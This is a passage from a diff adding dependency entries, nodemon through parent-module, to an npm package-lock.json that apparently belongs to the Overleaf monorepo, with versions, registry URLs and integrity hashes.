"sha512-QjVjwdXIt408MIiAqCX4oUKsgU2EqAGzs2Ppkm4aQYbjm+ZEWEcW4SfFNTr4uMNZma0ey4f5lgLrkB0aX0QMow==", + "dev": true, + "dependencies": { + "has-flag": "^3.0.0" + }, + "engines": { + "node": ">=4" + } + }, + "node_modules/nodemon/node_modules/yallist": { + "version": "4.0.0", + "resolved": "https://registry.npmjs.org/yallist/-/yallist-4.0.0.tgz", + "integrity": "sha512-3wdGidZyq5PB084XLES5TpOSRA3wjXAlIWMhum2kRcv/41Sn2emQ0dycQW4uZXLejwKvg6EsvbdlVL+FYEct7A==", + "dev": true + }, + "node_modules/nopt": { + "version": "5.0.0", + "resolved": "https://registry.npmjs.org/nopt/-/nopt-5.0.0.tgz", + "integrity": "sha512-Tbj67rffqceeLpcRXrT7vKAN8CwfPeIBgM7E6iBkmKLV7bEMwpGgYLGv0jACUsECaa/vuxP0IjEont6umdMgtQ==", + "dependencies": { + "abbrev": "1" + }, + "bin": { + "nopt": "bin/nopt.js" + }, + "engines": { + "node": ">=6" + } + }, + "node_modules/normalize-package-data": { + "version": "2.5.0", + "resolved": "https://registry.npmjs.org/normalize-package-data/-/normalize-package-data-2.5.0.tgz", + "integrity": "sha512-/5CMN3T0R4XTj4DcGaexo+roZSdSFW/0AOOTROrjxzCG1wrWXEsGbRKevjlIL+ZDE4sZlJr5ED4YW0yqmkK+eA==", + "dev": true, + "dependencies": { + "hosted-git-info": "^2.1.4", + "resolve": "^1.10.0", + "semver": "2 || 3 || 4 || 5", + "validate-npm-package-license": "^3.0.1" + } + }, + "node_modules/normalize-package-data/node_modules/semver": { + "version": "5.7.2", + "resolved": "https://registry.npmjs.org/semver/-/semver-5.7.2.tgz", + "integrity": "sha512-cBznnQ9KjJqU67B52RMC65CMarK2600WFnbkcaiwWq3xy/5haFJlshgnpjovMVJ+Hff49d8GEn0b87C5pDQ10g==", + "dev": true, + "bin": { + "semver": "bin/semver" + } + }, + "node_modules/normalize-path": { + "version": "3.0.0", + "resolved": "https://registry.npmjs.org/normalize-path/-/normalize-path-3.0.0.tgz", + "integrity": "sha512-6eZs5Ls3WtCisHWp9S2GUy8dqkpGi4BVSz3GaqiE6ezub0512ESztXUwUB6C6IKbQkY2Pnb/mD4WYojCRwcwLA==", + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/normalize-range": { + "version": "0.1.2", + "resolved": "https://registry.npmjs.org/normalize-range/-/normalize-range-0.1.2.tgz", + "integrity": "sha1-LRDAa9/TEuqXd2laTShDlFa3WUI=", + "dev": true, + 
"engines": { + "node": ">=0.10.0" + } + }, + "node_modules/now-and-later": { + "version": "3.0.0", + "resolved": "https://registry.npmjs.org/now-and-later/-/now-and-later-3.0.0.tgz", + "integrity": "sha512-pGO4pzSdaxhWTGkfSfHx3hVzJVslFPwBp2Myq9MYN/ChfJZF87ochMAXnvz6/58RJSf5ik2q9tXprBBrk2cpcg==", + "dev": true, + "dependencies": { + "once": "^1.4.0" + }, + "engines": { + "node": ">= 10.13.0" + } + }, + "node_modules/npm-run-path": { + "version": "4.0.1", + "resolved": "https://registry.npmjs.org/npm-run-path/-/npm-run-path-4.0.1.tgz", + "integrity": "sha512-S48WzZW777zhNIrn7gxOlISNAqi9ZC/uQFnRdbeIHhZhCA6UqpkOT8T1G7BvfdgP4Er8gF4sUbaS0i7QvIfCWw==", + "dev": true, + "dependencies": { + "path-key": "^3.0.0" + }, + "engines": { + "node": ">=8" + } + }, + "node_modules/npmlog": { + "version": "5.0.1", + "resolved": "https://registry.npmjs.org/npmlog/-/npmlog-5.0.1.tgz", + "integrity": "sha512-AqZtDUWOMKs1G/8lwylVjrdYgqA4d9nu8hc+0gzRxlDb1I10+FHBGMXs6aiQHFdCUUlqH99MUMuLfzWDNDtfxw==", + "dependencies": { + "are-we-there-yet": "^2.0.0", + "console-control-strings": "^1.1.0", + "gauge": "^3.0.0", + "set-blocking": "^2.0.0" + } + }, + "node_modules/nth-check": { + "version": "2.0.1", + "resolved": "https://registry.npmjs.org/nth-check/-/nth-check-2.0.1.tgz", + "integrity": "sha512-it1vE95zF6dTT9lBsYbxvqh0Soy4SPowchj0UBGj/V6cTPnXXtQOPUbhZ6CmGzAD/rW22LQK6E96pcdJXk4A4w==", + "dev": true, + "dependencies": { + "boolbase": "^1.0.0" + }, + "funding": { + "url": "https://github.com/fb55/nth-check?sponsor=1" + } + }, + "node_modules/nvd3": { + "version": "1.8.6", + "resolved": "https://registry.npmjs.org/nvd3/-/nvd3-1.8.6.tgz", + "integrity": "sha1-LT66dL8zNjtRAevx0JPFmlOuc8Q=", + "dev": true, + "peerDependencies": { + "d3": "^3.4.4" + } + }, + "node_modules/nwsapi": { + "version": "2.2.7", + "resolved": "https://registry.npmjs.org/nwsapi/-/nwsapi-2.2.7.tgz", + "integrity": "sha512-ub5E4+FBPKwAZx0UwIQOjYWGHTEq5sPqHQNRN8Z9e4A7u3Tj1weLJsL59yH9vmvqEtBHaOmT6cYQKIZOxp35FQ==", + "dev": true + }, + "node_modules/nypm": { + "version": "0.5.4", + "resolved": "https://registry.npmjs.org/nypm/-/nypm-0.5.4.tgz", + "integrity": "sha512-X0SNNrZiGU8/e/zAB7sCTtdxWTMSIO73q+xuKgglm2Yvzwlo8UoC5FNySQFCvl84uPaeADkqHUZUkWy4aH4xOA==", + "dev": true, + "license": "MIT", + "dependencies": { + "citty": "^0.1.6", + "consola": "^3.4.0", + "pathe": "^2.0.3", + "pkg-types": "^1.3.1", + "tinyexec": "^0.3.2", + "ufo": "^1.5.4" + }, + "bin": { + "nypm": "dist/cli.mjs" + }, + "engines": { + "node": "^14.16.0 || >=16.10.0" + } + }, + "node_modules/oauth": { + "version": "0.9.15", + "resolved": "https://registry.npmjs.org/oauth/-/oauth-0.9.15.tgz", + "integrity": "sha1-vR/vr2hslrdUda7VGWQS/2DPucE=" + }, + "node_modules/oauth-sign": { + "version": "0.9.0", + "resolved": "https://registry.npmjs.org/oauth-sign/-/oauth-sign-0.9.0.tgz", + "integrity": "sha512-fexhUFFPTGV8ybAtSIGbV6gOkSv8UtRbDBnAyLQw4QPKkgNlsH2ByPGtMUqdWkos6YCRmAqViwgZrJc/mRDzZQ==", + "engines": { + "node": "*" + } + }, + "node_modules/object-assign": { + "version": "4.1.1", + "resolved": "https://registry.npmjs.org/object-assign/-/object-assign-4.1.1.tgz", + "integrity": "sha1-IQmtx5ZYh8/AXLvUQsrIv7s2CGM=", + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/object-copy": { + "version": "0.1.0", + "resolved": "https://registry.npmjs.org/object-copy/-/object-copy-0.1.0.tgz", + "integrity": "sha512-79LYn6VAb63zgtmAteVOWo9Vdj71ZVBy3Pbse+VqxDpEP83XuujMrGqHIwAXJ5I/aM0zU7dIyIAhifVTPrNItQ==", + "dev": true, + "dependencies": { + "copy-descriptor": "^0.1.0", + "define-property": 
"^0.2.5", + "kind-of": "^3.0.3" + }, + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/object-copy/node_modules/define-property": { + "version": "0.2.5", + "resolved": "https://registry.npmjs.org/define-property/-/define-property-0.2.5.tgz", + "integrity": "sha512-Rr7ADjQZenceVOAKop6ALkkRAmH1A4Gx9hV/7ZujPUN2rkATqFO0JZLZInbAjpZYoJ1gUx8MRMQVkYemcbMSTA==", + "dev": true, + "dependencies": { + "is-descriptor": "^0.1.0" + }, + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/object-copy/node_modules/is-descriptor": { + "version": "0.1.7", + "resolved": "https://registry.npmjs.org/is-descriptor/-/is-descriptor-0.1.7.tgz", + "integrity": "sha512-C3grZTvObeN1xud4cRWl366OMXZTj0+HGyk4hvfpx4ZHt1Pb60ANSXqCK7pdOTeUQpRzECBSTphqvD7U+l22Eg==", + "dev": true, + "dependencies": { + "is-accessor-descriptor": "^1.0.1", + "is-data-descriptor": "^1.0.1" + }, + "engines": { + "node": ">= 0.4" + } + }, + "node_modules/object-copy/node_modules/kind-of": { + "version": "3.2.2", + "resolved": "https://registry.npmjs.org/kind-of/-/kind-of-3.2.2.tgz", + "integrity": "sha512-NOW9QQXMoZGg/oqnVNoNTTIFEIid1627WCffUBJEdMxYApq7mNE7CpzucIPc+ZQg25Phej7IJSmX3hO+oblOtQ==", + "dev": true, + "dependencies": { + "is-buffer": "^1.1.5" + }, + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/object-hash": { + "version": "2.2.0", + "resolved": "https://registry.npmjs.org/object-hash/-/object-hash-2.2.0.tgz", + "integrity": "sha512-gScRMn0bS5fH+IuwyIFgnh9zBdo4DV+6GhygmWM9HyNJSgS0hScp1f5vjtm7oIIOiT9trXrShAkLFSc2IqKNgw==", + "engines": { + "node": ">= 6" + } + }, + "node_modules/object-inspect": { + "version": "1.13.1", + "resolved": "https://registry.npmjs.org/object-inspect/-/object-inspect-1.13.1.tgz", + "integrity": "sha512-5qoj1RUiKOMsCCNLV1CBiPYE10sziTsnmNxkAI/rZhiD63CF7IqdFGC/XzjWjpSgLf0LxXX3bDFIh0E18f6UhQ==", + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/object-is": { + "version": "1.1.5", + "resolved": "https://registry.npmjs.org/object-is/-/object-is-1.1.5.tgz", + "integrity": "sha512-3cyDsyHgtmi7I7DfSSI2LDp6SK2lwvtbg0p0R1e0RvTqF5ceGx+K2dfSjm1bKDMVCFEDAQvy+o8c6a7VujOddw==", + "dev": true, + "dependencies": { + "call-bind": "^1.0.2", + "define-properties": "^1.1.3" + }, + "engines": { + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/object-keys": { + "version": "1.1.1", + "resolved": "https://registry.npmjs.org/object-keys/-/object-keys-1.1.1.tgz", + "integrity": "sha512-NuAESUOUMrlIXOfHKzD6bpPu3tYt3xvjNdRIQ+FeT0lNb4K8WR70CaDxhuNguS2XG+GjkyMwOzsN5ZktImfhLA==", + "engines": { + "node": ">= 0.4" + } + }, + "node_modules/object-visit": { + "version": "1.0.1", + "resolved": "https://registry.npmjs.org/object-visit/-/object-visit-1.0.1.tgz", + "integrity": "sha512-GBaMwwAVK9qbQN3Scdo0OyvgPW7l3lnaVMj84uTOZlswkX0KpF6fyDBJhtTthf7pymztoN36/KEr1DyhF96zEA==", + "dev": true, + "dependencies": { + "isobject": "^3.0.0" + }, + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/object.assign": { + "version": "4.1.5", + "resolved": "https://registry.npmjs.org/object.assign/-/object.assign-4.1.5.tgz", + "integrity": "sha512-byy+U7gp+FVwmyzKPYhW2h5l3crpmGsxl7X2s8y43IgxvG4g3QZ6CffDtsNQy1WsmZpQbO+ybo0AlW7TY6DcBQ==", + "license": "MIT", + "dependencies": { + "call-bind": "^1.0.5", + "define-properties": "^1.2.1", + "has-symbols": "^1.0.3", + "object-keys": "^1.1.1" + }, + "engines": { + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/object.entries": { + 
"version": "1.1.7", + "resolved": "https://registry.npmjs.org/object.entries/-/object.entries-1.1.7.tgz", + "integrity": "sha512-jCBs/0plmPsOnrKAfFQXRG2NFjlhZgjjcBLSmTnEhU8U6vVTsVe8ANeQJCHTl3gSsI4J+0emOoCgoKlmQPMgmA==", + "dev": true, + "dependencies": { + "call-bind": "^1.0.2", + "define-properties": "^1.2.0", + "es-abstract": "^1.22.1" + }, + "engines": { + "node": ">= 0.4" + } + }, + "node_modules/object.fromentries": { + "version": "2.0.6", + "resolved": "https://registry.npmjs.org/object.fromentries/-/object.fromentries-2.0.6.tgz", + "integrity": "sha512-VciD13dswC4j1Xt5394WR4MzmAQmlgN72phd/riNp9vtD7tp4QQWJ0R4wvclXcafgcYK8veHRed2W6XeGBvcfg==", + "dev": true, + "dependencies": { + "call-bind": "^1.0.2", + "define-properties": "^1.1.4", + "es-abstract": "^1.20.4" + }, + "engines": { + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/object.getownpropertydescriptors": { + "version": "2.1.3", + "resolved": "https://registry.npmjs.org/object.getownpropertydescriptors/-/object.getownpropertydescriptors-2.1.3.tgz", + "integrity": "sha512-VdDoCwvJI4QdC6ndjpqFmoL3/+HxffFBbcJzKi5hwLLqqx3mdbedRpfZDdK0SrOSauj8X4GzBvnDZl4vTN7dOw==", + "dependencies": { + "call-bind": "^1.0.2", + "define-properties": "^1.1.3", + "es-abstract": "^1.19.1" + }, + "engines": { + "node": ">= 0.8" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/object.getprototypeof": { + "version": "1.0.5", + "resolved": "https://registry.npmjs.org/object.getprototypeof/-/object.getprototypeof-1.0.5.tgz", + "integrity": "sha512-4G0QiXpoIppBUz5efmxTm/HTbVN2ioGjk/PbsaNvwISFX+saj8muGp6vNuzIdsosFxM4V/kpUVNvy/+9+DVBZQ==", + "dev": true, + "dependencies": { + "call-bind": "^1.0.2", + "define-properties": "^1.2.0", + "es-abstract": "^1.22.1", + "reflect.getprototypeof": "^1.0.4" + }, + "engines": { + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/object.hasown": { + "version": "1.1.2", + "resolved": "https://registry.npmjs.org/object.hasown/-/object.hasown-1.1.2.tgz", + "integrity": "sha512-B5UIT3J1W+WuWIU55h0mjlwaqxiE5vYENJXIXZ4VFe05pNYrkKuK0U/6aFcb0pKywYJh7IhfoqUfKVmrJJHZHw==", + "dev": true, + "dependencies": { + "define-properties": "^1.1.4", + "es-abstract": "^1.20.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/object.pick": { + "version": "1.3.0", + "resolved": "https://registry.npmjs.org/object.pick/-/object.pick-1.3.0.tgz", + "integrity": "sha512-tqa/UMy/CCoYmj+H5qc07qvSL9dqcs/WZENZ1JbtWBlATP+iVOe778gE6MSijnyCnORzDuX6hU+LA4SZ09YjFQ==", + "dev": true, + "dependencies": { + "isobject": "^3.0.1" + }, + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/object.values": { + "version": "1.1.6", + "resolved": "https://registry.npmjs.org/object.values/-/object.values-1.1.6.tgz", + "integrity": "sha512-FVVTkD1vENCsAcwNs9k6jea2uHC/X0+JcjG8YA60FN5CMaJmG95wT9jek/xX9nornqGRrBkKtzuAu2wuHpKqvw==", + "dev": true, + "dependencies": { + "call-bind": "^1.0.2", + "define-properties": "^1.1.4", + "es-abstract": "^1.20.4" + }, + "engines": { + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/objectorarray": { + "version": "1.0.5", + "resolved": "https://registry.npmjs.org/objectorarray/-/objectorarray-1.0.5.tgz", + "integrity": "sha512-eJJDYkhJFFbBBAxeh8xW+weHlkI28n2ZdQV/J/DNfWfSKlGEf2xcfAbZTv3riEXHAhL9SVOTs2pRmXiSTf78xg==", + "dev": true, + "license": "ISC" + }, + "node_modules/obuf": 
{ + "version": "1.1.2", + "resolved": "https://registry.npmjs.org/obuf/-/obuf-1.1.2.tgz", + "integrity": "sha512-PX1wu0AmAdPqOL1mWhqmlOd8kOIZQwGZw6rh7uby9fTc5lhaOWFLX3I6R1hrF9k3zUY40e6igsLGkDXK92LJNg==", + "dev": true, + "license": "MIT" + }, + "node_modules/octonode": { + "version": "0.9.5", + "resolved": "https://registry.npmjs.org/octonode/-/octonode-0.9.5.tgz", + "integrity": "sha512-l+aX9jNVkaagh7u/q2QpNKdL8XUagdztl+ebXxBRU6FJ1tpRxAH/ygIuWh0h7eS491BsyH6bb0QZIQEC2+u5oA==", + "dependencies": { + "bluebird": "^3.5.0", + "deep-extend": "^0.6.0", + "randomstring": "^1.1.5", + "request": "^2.72.0" + }, + "engines": { + "node": ">0.4.11" + } + }, + "node_modules/on-finished": { + "version": "2.3.0", + "resolved": "https://registry.npmjs.org/on-finished/-/on-finished-2.3.0.tgz", + "integrity": "sha1-IPEzZIGwg811M3mSoWlxqi2QaUc=", + "dependencies": { + "ee-first": "1.1.1" + }, + "engines": { + "node": ">= 0.8" + } + }, + "node_modules/on-headers": { + "version": "1.0.2", + "resolved": "https://registry.npmjs.org/on-headers/-/on-headers-1.0.2.tgz", + "integrity": "sha512-pZAE+FJLoyITytdqK0U5s+FIpjN0JP3OzFi/u8Rx+EV5/W+JTWGXG8xFzevE7AjBfDqHv/8vL8qQsIhHnqRkrA==", + "engines": { + "node": ">= 0.8" + } + }, + "node_modules/once": { + "version": "1.4.0", + "resolved": "https://registry.npmjs.org/once/-/once-1.4.0.tgz", + "integrity": "sha1-WDsap3WWHUsROsF9nFC6753Xa9E=", + "dependencies": { + "wrappy": "1" + } + }, + "node_modules/onetime": { + "version": "5.1.2", + "resolved": "https://registry.npmjs.org/onetime/-/onetime-5.1.2.tgz", + "integrity": "sha512-kbpaSSGJTWdAY5KPVeMOKXSrPtr8C8C7wodJbcsd51jRnmD+GZu8Y0VoU6Dm5Z4vWr0Ig/1NKuWRKf7j5aaYSg==", + "dev": true, + "dependencies": { + "mimic-fn": "^2.1.0" + }, + "engines": { + "node": ">=6" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/open": { + "version": "8.4.2", + "resolved": "https://registry.npmjs.org/open/-/open-8.4.2.tgz", + "integrity": "sha512-7x81NCL719oNbsq/3mh+hVrAWmFuEYUqrq/Iw3kUzH8ReypT9QQ0BLoJS7/G9k6N81XjW4qHWtjWwe/9eLy1EQ==", + "dev": true, + "license": "MIT", + "dependencies": { + "define-lazy-prop": "^2.0.0", + "is-docker": "^2.1.1", + "is-wsl": "^2.2.0" + }, + "engines": { + "node": ">=12" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/openapi3-ts": { + "version": "3.1.2", + "resolved": "https://registry.npmjs.org/openapi3-ts/-/openapi3-ts-3.1.2.tgz", + "integrity": "sha512-S8fijNOqe/ut0kEDAwHZnI7sVYqb8Q3XnISmSyXmK76jgrcf4ableI75KTY1qdksd9EI/t39Vi5M4VYKrkNKfQ==", + "dependencies": { + "yaml": "^2.1.3" + } + }, + "node_modules/openapi3-ts/node_modules/yaml": { + "version": "2.3.1", + "resolved": "https://registry.npmjs.org/yaml/-/yaml-2.3.1.tgz", + "integrity": "sha512-2eHWfjaoXgTBC2jNM1LRef62VQa0umtvRiDSk6HSzW7RvS5YtkabJrwYLLEKWBc8a5U2PTSCs+dJjUTJdlHsWQ==", + "engines": { + "node": ">= 14" + } + }, + "node_modules/opentracing": { + "version": "0.14.7", + "resolved": "https://registry.npmjs.org/opentracing/-/opentracing-0.14.7.tgz", + "integrity": "sha512-vz9iS7MJ5+Bp1URw8Khvdyw1H/hGvzHWlKQ7eRrQojSCDL1/SrWfrY9QebLw97n2deyRtzHRC3MkQfVNUCo91Q==", + "engines": { + "node": ">=0.10" + } + }, + "node_modules/optionator": { + "version": "0.8.3", + "resolved": "https://registry.npmjs.org/optionator/-/optionator-0.8.3.tgz", + "integrity": "sha512-+IW9pACdk3XWmmTXG8m3upGUJst5XRGzxMRjXzAuJ1XnIFNvfhjjIuYkDvysnPQ7qzqVzLt78BCruntqRhWQbA==", + "dependencies": { + "deep-is": "~0.1.3", + "fast-levenshtein": "~2.0.6", + "levn": "~0.3.0", + "prelude-ls": 
"~1.1.2", + "type-check": "~0.3.2", + "word-wrap": "~1.2.3" + }, + "engines": { + "node": ">= 0.8.0" + } + }, + "node_modules/optionator/node_modules/levn": { + "version": "0.3.0", + "resolved": "https://registry.npmjs.org/levn/-/levn-0.3.0.tgz", + "integrity": "sha512-0OO4y2iOHix2W6ujICbKIaEQXvFQHue65vUG3pb5EUomzPI90z9hsA1VsO/dbIIpC53J8gxM9Q4Oho0jrCM/yA==", + "dependencies": { + "prelude-ls": "~1.1.2", + "type-check": "~0.3.2" + }, + "engines": { + "node": ">= 0.8.0" + } + }, + "node_modules/optionator/node_modules/prelude-ls": { + "version": "1.1.2", + "resolved": "https://registry.npmjs.org/prelude-ls/-/prelude-ls-1.1.2.tgz", + "integrity": "sha512-ESF23V4SKG6lVSGZgYNpbsiaAkdab6ZgOxe52p7+Kid3W3u3bxR4Vfd/o21dmN7jSt0IwgZ4v5MUd26FEtXE9w==", + "engines": { + "node": ">= 0.8.0" + } + }, + "node_modules/optionator/node_modules/type-check": { + "version": "0.3.2", + "resolved": "https://registry.npmjs.org/type-check/-/type-check-0.3.2.tgz", + "integrity": "sha512-ZCmOJdvOWDBYJlzAoFkC+Q0+bUyEOS1ltgp1MGU03fqHG+dbi9tBFU2Rd9QKiDZFAYrhPh2JUf7rZRIuHRKtOg==", + "dependencies": { + "prelude-ls": "~1.1.2" + }, + "engines": { + "node": ">= 0.8.0" + } + }, + "node_modules/options": { + "version": "0.0.6", + "resolved": "https://registry.npmjs.org/options/-/options-0.0.6.tgz", + "integrity": "sha512-bOj3L1ypm++N+n7CEbbe473A414AB7z+amKYshRb//iuL3MpdDCLhPnw6aVTdKB9g5ZRVHIEp8eUln6L2NUStg==", + "engines": { + "node": ">=0.4.0" + } + }, + "node_modules/os-tmpdir": { + "version": "1.0.2", + "resolved": "https://registry.npmjs.org/os-tmpdir/-/os-tmpdir-1.0.2.tgz", + "integrity": "sha1-u+Z0BseaqFxc/sdm/lc0VV36EnQ=", + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/ospath": { + "version": "1.2.2", + "resolved": "https://registry.npmjs.org/ospath/-/ospath-1.2.2.tgz", + "integrity": "sha1-EnZjl3Sj+O8lcvf+QoDg6kVQwHs=", + "dev": true + }, + "node_modules/otplib": { + "version": "12.0.1", + "resolved": "https://registry.npmjs.org/otplib/-/otplib-12.0.1.tgz", + "integrity": "sha512-xDGvUOQjop7RDgxTQ+o4pOol0/3xSZzawTiPKRrHnQWAy0WjhNs/5HdIDJCrqC4MBynmjXgULc6YfioaxZeFgg==", + "dependencies": { + "@otplib/core": "^12.0.1", + "@otplib/preset-default": "^12.0.1", + "@otplib/preset-v11": "^12.0.1" + } + }, + "node_modules/overleaf-editor": { + "resolved": "services/history-v1", + "link": true + }, + "node_modules/overleaf-editor-core": { + "resolved": "libraries/overleaf-editor-core", + "link": true + }, + "node_modules/p-event": { + "version": "4.2.0", + "resolved": "https://registry.npmjs.org/p-event/-/p-event-4.2.0.tgz", + "integrity": "sha512-KXatOjCRXXkSePPb1Nbi0p0m+gQAwdlbhi4wQKJPI1HsMQS9g+Sqp2o+QHziPr7eYJyOZet836KoHEVM1mwOrQ==", + "dependencies": { + "p-timeout": "^3.1.0" + }, + "engines": { + "node": ">=8" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/p-finally": { + "version": "1.0.0", + "resolved": "https://registry.npmjs.org/p-finally/-/p-finally-1.0.0.tgz", + "integrity": "sha1-P7z7FbiZpEEjs0ttzBi3JDNqLK4=", + "engines": { + "node": ">=4" + } + }, + "node_modules/p-limit": { + "version": "3.1.0", + "resolved": "https://registry.npmjs.org/p-limit/-/p-limit-3.1.0.tgz", + "integrity": "sha512-TYOanM3wGwNGsZN2cVTYPArw454xnXj5qmWF1bEoAc4+cU/ol7GVh7odevjp1FNHduHc3KZMcFduxU5Xc6uJRQ==", + "dependencies": { + "yocto-queue": "^0.1.0" + }, + "engines": { + "node": ">=10" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/p-locate": { + "version": "5.0.0", + "resolved": 
"https://registry.npmjs.org/p-locate/-/p-locate-5.0.0.tgz", + "integrity": "sha512-LaNjtRWUBY++zB5nE/NwcaoMylSPk+S+ZHNB1TzdbMJMny6dynpAGt7X/tl/QYq3TIeE6nxHppbo2LGymrG5Pw==", + "dependencies": { + "p-limit": "^3.0.2" + }, + "engines": { + "node": ">=10" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/p-map": { + "version": "4.0.0", + "resolved": "https://registry.npmjs.org/p-map/-/p-map-4.0.0.tgz", + "integrity": "sha512-/bjOqmgETBYB5BoEeGVea8dmvHb2m9GLy1E9W43yeyfP6QQCZGFNa+XRceJEuDB6zqr+gKpIAmlLebMpykw/MQ==", + "dependencies": { + "aggregate-error": "^3.0.0" + }, + "engines": { + "node": ">=10" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/p-props": { + "version": "4.0.0", + "resolved": "https://registry.npmjs.org/p-props/-/p-props-4.0.0.tgz", + "integrity": "sha512-3iKFbPdoPG7Ne3cMA53JnjPsTMaIzE9gxKZnvKJJivTAeqLEZPBu6zfi6DYq9AsH1nYycWmo3sWCNI8Kz6T2Zg==", + "dependencies": { + "p-map": "^4.0.0" + }, + "engines": { + "node": ">=10" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/p-queue": { + "version": "8.1.0", + "resolved": "https://registry.npmjs.org/p-queue/-/p-queue-8.1.0.tgz", + "integrity": "sha512-mxLDbbGIBEXTJL0zEx8JIylaj3xQ7Z/7eEVjcF9fJX4DBiH9oqe+oahYnlKKxm0Ci9TlWTyhSHgygxMxjIB2jw==", + "license": "MIT", + "dependencies": { + "eventemitter3": "^5.0.1", + "p-timeout": "^6.1.2" + }, + "engines": { + "node": ">=18" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/p-queue/node_modules/eventemitter3": { + "version": "5.0.1", + "resolved": "https://registry.npmjs.org/eventemitter3/-/eventemitter3-5.0.1.tgz", + "integrity": "sha512-GWkBvjiSZK87ELrYOSESUYeVIc9mvLLf/nXalMOS5dYrgZq9o5OVkbZAVM06CVxYsCwH9BDZFPlQTlPA1j4ahA==", + "license": "MIT" + }, + "node_modules/p-queue/node_modules/p-timeout": { + "version": "6.1.4", + "resolved": "https://registry.npmjs.org/p-timeout/-/p-timeout-6.1.4.tgz", + "integrity": "sha512-MyIV3ZA/PmyBN/ud8vV9XzwTrNtR4jFrObymZYnZqMmW0zA8Z17vnT0rBgFE/TlohB+YCHqXMgZzb3Csp49vqg==", + "license": "MIT", + "engines": { + "node": ">=14.16" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/p-retry": { + "version": "6.2.1", + "resolved": "https://registry.npmjs.org/p-retry/-/p-retry-6.2.1.tgz", + "integrity": "sha512-hEt02O4hUct5wtwg4H4KcWgDdm+l1bOaEy/hWzd8xtXB9BqxTWBBhb+2ImAtH4Cv4rPjV76xN3Zumqk3k3AhhQ==", + "dev": true, + "license": "MIT", + "dependencies": { + "@types/retry": "0.12.2", + "is-network-error": "^1.0.0", + "retry": "^0.13.1" + }, + "engines": { + "node": ">=16.17" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/p-throttle": { + "version": "4.1.1", + "resolved": "https://registry.npmjs.org/p-throttle/-/p-throttle-4.1.1.tgz", + "integrity": "sha512-TuU8Ato+pRTPJoDzYD4s7ocJYcNSEZRvlxoq3hcPI2kZDZ49IQ1Wkj7/gDJc3X7XiEAAvRGtDzdXJI0tC3IL1g==", + "engines": { + "node": ">=10" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/p-timeout": { + "version": "3.2.0", + "resolved": "https://registry.npmjs.org/p-timeout/-/p-timeout-3.2.0.tgz", + "integrity": "sha512-rhIwUycgwwKcP9yTOOFK/AKsAopjjCakVqLHePO3CC6Mir1Z99xT+R63jZxAT5lFZLa2inS5h+ZS2GvR99/FBg==", + "dependencies": { + "p-finally": "^1.0.0" + }, + "engines": { + "node": ">=8" + } + }, + "node_modules/p-try": { + "version": "2.2.0", + "resolved": 
"https://registry.npmjs.org/p-try/-/p-try-2.2.0.tgz", + "integrity": "sha512-R4nPAVTAU0B9D35/Gk3uJf/7XYbQcyohSKdvAxIRSNghFl4e71hVoGnBNQz9cWaXxO2I10KTC+3jMdvvoKw6dQ==", + "engines": { + "node": ">=6" + } + }, + "node_modules/package-json-from-dist": { + "version": "1.0.0", + "resolved": "https://registry.npmjs.org/package-json-from-dist/-/package-json-from-dist-1.0.0.tgz", + "integrity": "sha512-dATvCeZN/8wQsGywez1mzHtTlP22H8OEfPrVMLNr4/eGa+ijtLn/6M5f0dY8UKNrC2O9UCU6SSoG3qRKnt7STw==", + "dev": true + }, + "node_modules/packet-reader": { + "version": "1.0.0", + "resolved": "https://registry.npmjs.org/packet-reader/-/packet-reader-1.0.0.tgz", + "integrity": "sha512-HAKu/fG3HpHFO0AA8WE8q2g+gBJaZ9MG7fcKk+IJPLTGAD6Psw4443l+9DGRbOIh3/aXr7Phy0TjilYivJo5XQ==" + }, + "node_modules/pako": { + "version": "1.0.11", + "resolved": "https://registry.npmjs.org/pako/-/pako-1.0.11.tgz", + "integrity": "sha512-4hLB8Py4zZce5s4yd9XzopqwVv/yGNhV1Bl8NTmCq1763HeK2+EwVTv+leGeL13Dnh2wfbqowVPXCIO0z4taYw==", + "dev": true, + "license": "(MIT AND Zlib)" + }, + "node_modules/param-case": { + "version": "3.0.4", + "resolved": "https://registry.npmjs.org/param-case/-/param-case-3.0.4.tgz", + "integrity": "sha512-RXlj7zCYokReqWpOPH9oYivUzLYZ5vAPIfEmCTNViosC78F8F0H9y7T7gG2M39ymgutxF5gcFEsyZQSph9Bp3A==", + "dev": true, + "dependencies": { + "dot-case": "^3.0.4", + "tslib": "^2.0.3" + } + }, + "node_modules/parent-module": { + "version": "1.0.1", + "resolved": "https://registry.npmjs.org/parent-module/-/parent-module-1.0.1.tgz", + "integrity": 